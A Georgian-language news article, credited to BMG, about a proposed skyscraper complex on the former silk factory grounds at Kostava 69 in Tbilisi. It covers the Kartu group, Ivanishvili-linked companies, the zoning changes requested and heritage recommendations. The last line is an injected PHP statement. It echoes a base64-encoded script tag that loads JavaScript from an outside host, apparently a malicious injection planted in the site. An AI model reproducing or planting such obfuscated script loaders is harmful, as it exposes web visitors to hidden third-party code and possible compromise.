celsiusi
ავერსი საქკაბელი

თბილისის ცენტრში, გმირთა მოედანზე ერთ-ერთი ყველაზე დიდი უძრავი ქონების პროექტის განხორციელება იგეგმება. საქალაქო ურბანულ სამსახურს, “ქართუ ჯგუფში” შემავალმა კომპანია “კოსტავას 69”-მა უკვე წარუდგინა პროექტი, რომლითაც აბრეშუმის ქარხნის ტერიტორიაზე მრავალფუნქციური კომპლექსის მოწყობა იგეგმება. ამონაწერის მიხედვით, "კოსტავას 69" საქველმოქმედო ფონდ "ქართუს" შვილობილია. უშუალოდ პროექტის დეველოპმენტში კომპანია Hაუსარტ-ი არის ჩართული.

არქიტექტურული ნახაზების მიხედვით, პროექტი ორი ცათამბჯენისგან შედგება, რომლიდან ერთის სიმაღლეც მაქსიმუმ 65 სართულით არის განსაზღვრული. განაშენიანების რეგულირების გეგმისა და არქიტექტურული პროექტების დამტკიცების შემთხვევაში ეს ქალაქში ტელეანძის შემდეგ ყველაზე მაღალი ნაგებობა იქნება. პროექტის თანახმად, მრავალფუნქციური კომპლექსის მოცულობა 155,588 კვადრატული მეტრი იქნება.

მუნიციპალური სამსახურისთვის გაგზავნილ ტექნიკურ-ეკონომიკურ დასაბუთებაში ივანიშვილის კომპანია კ2 ზონალური პარამეტრების გაზრდას მოითხოვს. ამასთანავე, სარეკრეაციო ზონის სტატუსის ცვლილებას.

პროექტის მიხედვით, შენარჩუნდება აბრეშუმის ქარხნის ისტორიული შენობის ნაწილი.

პროექტი არ მოიცავს ლაგუნა ვერეს საცურაო აუზს, რომელიც ასევე ბიძინა ივანიშვილის ბიზნესჯგუფის საკუთრებაშია.

“დღევანდელი მდგომარეობით, ტერიტორიაზე დედაქალაქის მიწათსარგებლობის დოკუმენტით მოქმედებს სარეკრეაციო ზონა 2 (რზ-2). რომელიც მოიცავს თბილისის განაშენიანებული ტერიტორიების საზღვრებში არსებულ/დაგეგმილ გამწვანებულ ტერიტორიებს: პარკს, ღია სათამაშო მოედნებს და მსგავსი ტიპის სხვა ტერიტორიებს; აღნიშნულის გარდა, 2019 წლის 15 მარტს #39-18 დადგენილებით დამტკიცებული დედაქალაქის მიწათსარგებლობის ახალი გენგეგმით, არეალზე შემოთავაზებული რეკრეაციული ზონა 2-ის სახით, განისაზღვრა გამწვანებული ტერიტორიის ფენა, რომელიც ამ კონკრეტულ შემთხვევაში, პირობითი ხასიათისაა, რადგანაც ფარავს ტერიტორიაზე არსებულ დანგრეულ და რამდენიმე სართულიან ნაგებობებსაც.

საკითხის დამუშავებისას ვეყრდნობით ისტორიკოსი მკლევარის მიერ ჩატარებულ ისტორიულ-არქიტექტურული კვლევის შედეგებს და გაწეულ რეკომენდაციებს, სადაც იკვეთება შემდეგი მახასიათებლები: კოსტავას ქუჩა #69 _ ყოფ. აბრეშუმის ფაბრიკის, კოსტავას შესახვევი #34 `ლაგუნა ვერე-ს შენობების რეკონსტრუქციისა და მიმდებარე ტერიტორიის კვლევამ ცხადჰყო, რომ აღნიშნულ ტერიტორიაზე მდებარე ნაგეობებიდან ყოფილი აბრეშუმის ფაბრიკის ძველ, აგურის კორპუსს მაღალი ისტორიულ-არქიტექტურული ღირებულება გააჩნია და მასზე სასურვერლია გავრცელდეს მხოლოდ კულტურული მემკვიდრეობის მიმართ ჩასატარებელი ღონისძიებები - რეაბილიტაცია-ადაპტაცია. კერძოდ, სხვენის სართულის ამაღლება და გარდაქმნა გამოყენებად სივრცედ. ამავე ტერიტორიის ფარგლებში მდებარე ყოფილი საცურაო აუზის `ლაგუნა ვერეს სპორტული კომპლექსის ნაგებობა უკიდურესად მძიმე მდგომარეობაშია და შესაბამისად მისი კონსტრუქციის მდგრადობის, დემონტაჟის ან ახალი აუზის აგების საკითხი მსჯელობის საგანია. ამასთან, კომპლექსის შემადგენელი მოზაიკური პანო ყველა შემთხვევაში უნდა დაექვემდებაროს კონსერვაცია-რესტავრაციას და ხელახლა განთავსდეს რეკონსტრუირებულ აუზზე,”- ნათქვამია პროექტის ტექნიკურ-ეკონომიკური დასაბუთების დოკუმენტში.

წყარო: BMG

536
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");